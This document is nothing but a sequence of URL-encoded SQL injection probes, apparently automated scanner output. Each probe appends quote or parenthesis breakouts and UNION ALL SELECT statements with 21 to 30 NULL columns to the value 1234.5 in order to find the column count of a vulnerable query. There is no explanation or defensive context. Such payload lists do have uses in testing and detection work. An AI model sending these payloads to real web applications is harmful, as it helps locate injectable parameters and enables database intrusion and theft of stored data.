1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281803%3D1803 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286909%3D6909 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288874%3D8874 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284586%3D4586 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%282721%3D2721 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281806%3D1806 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%282319%3D2319 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281300%3D1300 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281073%3D1073 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285822%3D5822 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282983%3D2983 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286781%3D6781 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284013%3D4013 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%289873%3D9873 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283445%3D3445 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%287761%3D7761 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%289068%3D9068 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282382%3D2382 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283722%3D3722 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282318%3D2318 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289222%3D9222 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281780%3D1780 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282931%3D2931 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289460%3D9460 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283897%3D3897 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%288088%3D8088 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283678%3D3678 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285766%3D5766 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%284120%3D4120 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285238%3D5238 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27esrl%27%3D%27esrl 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27rCIJ%27%3D%27rCIJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27HIod%27%3D%27HIod 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27eNBz%27%3D%27eNBz 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27uRZk%27%3D%27uRZk 